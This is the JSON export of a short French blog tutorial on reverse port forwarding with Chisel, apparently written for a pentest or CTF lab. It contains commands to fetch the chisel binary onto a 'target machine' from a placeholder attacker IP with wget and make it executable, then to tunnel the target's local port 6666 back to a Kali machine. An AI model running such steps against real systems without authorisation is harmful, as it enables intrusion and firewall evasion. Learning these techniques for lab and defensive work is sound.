{"id":1423,"date":"2021-03-26T13:47:25","date_gmt":"2021-03-26T12:47:25","guid":{"rendered":"https:\/\/mikadmin.fr\/blog\/?p=1423"},"modified":"2021-09-19T01:37:18","modified_gmt":"2021-09-18T23:37:18","slug":"port-forwarding-with-chisel","status":"publish","type":"post","link":"https:\/\/mikadmin.fr\/blog\/port-forwarding-with-chisel\/","title":{"rendered":"Port forwarding with Chisel"},"content":{"rendered":"<span class=\"span-reading-time rt-reading-time\" style=\"display: block;\"><span class=\"rt-label rt-prefix\"><\/span> <span class=\"rt-time\"> 2<\/span> <span class=\"rt-label rt-postfix\">min read<\/span><\/span><p>Views: 2644<\/p>\n<p><\/p>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\"><em><a href=\"https:\/\/github.com\/jpillora\/chisel\" target=\"_blank\" rel=\"noreferrer noopener\">Chisel<\/a> is a fast TCP\/UDP tunnel, transported over HTTP, secured via SSH.<\/em><\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/03\/image-11.png\" alt=\"chisel\" class=\"wp-image-1464\" width=\"555\" height=\"340\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/03\/image-11.png 960w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/03\/image-11-300x184.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/03\/image-11-150x92.png 150w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/03\/image-11-768x471.png 768w\" sizes=\"auto, (max-width: 555px) 100vw, 555px\" \/><\/figure><\/div>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>                         <\/p>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n\n<h2 class=\"has-text-align-center wp-block-heading\" style=\"font-size:35px\">Mise en pratique de port forwarding avec chisel<\/h2>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Dans notre exemple, nous allons <strong>forward<\/strong> un port local de la <strong>machine cible<\/strong> vers notre <strong>machine <a href=\"https:\/\/mikadmin.fr\/blog\/tryhackme-chill-hack\/\" target=\"_blank\" rel=\"noreferrer noopener\">kali<\/a><\/strong>.<\/p>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Ici, le port qui nous int\u00e9resse est le port <strong><span style=\"color:#00d084\" class=\"tadv-color\">6666<\/span><\/strong> \u00e9coutant en local et obtenu gr\u00e2ce \u00e0 la commande <strong>netstat<\/strong> :<\/p>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<pre class=\"wp-block-prismatic-blocks\"><code class=\"language-bash\">netstat -tulpn<\/code><\/pre>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"826\" height=\"228\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/03\/image-6.png\" alt=\"\" class=\"wp-image-1428\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/03\/image-6.png 826w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/03\/image-6-300x83.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/03\/image-6-150x41.png 150w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/03\/image-6-768x212.png 768w\" sizes=\"auto, (max-width: 826px) 100vw, 826px\" \/><\/figure><\/div>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Le service en question est un <strong><span style=\"color:#9b51e0\" class=\"tadv-color\">service web<\/span><\/strong> :<\/p>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"589\" height=\"158\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/03\/image-7.png\" alt=\"\" class=\"wp-image-1429\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/03\/image-7.png 589w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/03\/image-7-300x80.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/03\/image-7-150x40.png 150w\" sizes=\"auto, (max-width: 589px) 100vw, 589px\" \/><\/figure><\/div>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Nous allons donc importer le binaire<strong><span style=\"color:#0693e3\" class=\"tadv-color\"> chisel<\/span><\/strong> sur la <strong>machine cible<\/strong> \u00e0 l&rsquo;aide des commandes suivantes : <\/p>\n\n\n\n<pre class=\"wp-block-prismatic-blocks\"><code class=\"language-markdown\"># sur votre machine\npython3 -m http.server 8000\n\n# sur la machine cible\nwget http:\/\/VOTREIP:8000\/chisel\nchmod +x chisel<\/code><\/pre>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"635\" height=\"250\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/03\/image-8.png\" alt=\"chisel port forwarding\" class=\"wp-image-1430\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/03\/image-8.png 635w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/03\/image-8-300x118.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/03\/image-8-150x59.png 150w\" sizes=\"auto, (max-width: 635px) 100vw, 635px\" \/><\/figure><\/div>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Nous avons donc r\u00e9cup\u00e9r\u00e9 <strong><span style=\"color:#0693e3\" class=\"tadv-color\">chisel<\/span><\/strong> sur la <strong>machine cible<\/strong>, voici donc la partie int\u00e9ressante :<\/p>\n\n\n\n<pre class=\"wp-block-prismatic-blocks\"><code class=\"language-bash\"># sur votre machine\n.\/chisel server -p 8888 -reverse<\/code><\/pre>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"717\" height=\"145\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/03\/image-9.png\" alt=\"\" class=\"wp-image-1431\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/03\/image-9.png 717w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/03\/image-9-300x61.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/03\/image-9-150x30.png 150w\" sizes=\"auto, (max-width: 717px) 100vw, 717px\" \/><\/figure><\/div>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Et enfin voici la derni\u00e8re commande \u00e0 ex\u00e9cuter sur la <strong>machine cible<\/strong> :<\/p>\n\n\n\n<pre class=\"wp-block-prismatic-blocks\"><code class=\"language-bash\"># sur la machine cible\n.\/chisel client VOTREIP:8888 R:8889:localhost:6666<\/code><\/pre>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\"><strong><span style=\"color:#cf2e2e\" class=\"tadv-color\">8888<\/span><\/strong> : <strong>port local sur votre machine pour \u00e9couter la connexion<\/strong><\/p>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\"><strong><span style=\"color:#00d084\" class=\"tadv-color\">6666<\/span><\/strong> : <strong>port local du service de la machine cible<\/strong><\/p>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\"><strong><span style=\"color:#fcb900\" class=\"tadv-color\">8889<\/span><\/strong> : <strong>port local sur votre machine pour r\u00e9ceptionner le service souhait\u00e9<\/strong><\/p>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">C&rsquo;est l&rsquo;heure de la v\u00e9rification nous allons donc nous rendre sur <strong><span style=\"color:#ff6900\" class=\"tadv-color\">firefox<\/span><\/strong> afin de constater que nous pouvons bien acc\u00e9der \u00e0 ce <strong>fameux service<\/strong> :<\/p>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/03\/image-10.png\" alt=\"chisel\" class=\"wp-image-1432\" width=\"497\" height=\"480\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/03\/image-10.png 760w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/03\/image-10-300x290.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/03\/image-10-150x145.png 150w\" sizes=\"auto, (max-width: 497px) 100vw, 497px\" \/><\/figure><\/div>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p><span class=\"span-reading-time rt-reading-time\" style=\"display: block;\"><span class=\"rt-label rt-prefix\"><\/span> <span class=\"rt-time\"> 2<\/span> <span class=\"rt-label rt-postfix\">min read<\/span><\/span>In our example, we will forward a local port from the target machine to our kali machine using chisel. <a href=\"https:\/\/mikadmin.fr\/blog\/port-forwarding-with-chisel\/\" class=\"more-link\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":1463,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_themeisle_gutenberg_block_has_review":false,"footnotes":""},"categories":[4,2],"tags":[57,59,5,9,58],"class_list":["post-1423","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-infosec","category-network","tag-chisel","tag-firewall","tag-infosec","tag-linux","tag-port-forwarding"],"aioseo_notices":[],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/posts\/1423","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/comments?post=1423"}],"version-history":[{"count":0,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/posts\/1423\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/media\/1463"}],"wp:attachment":[{"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/media?parent=1423"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/categories?post=1423"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/tags?post=1423"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}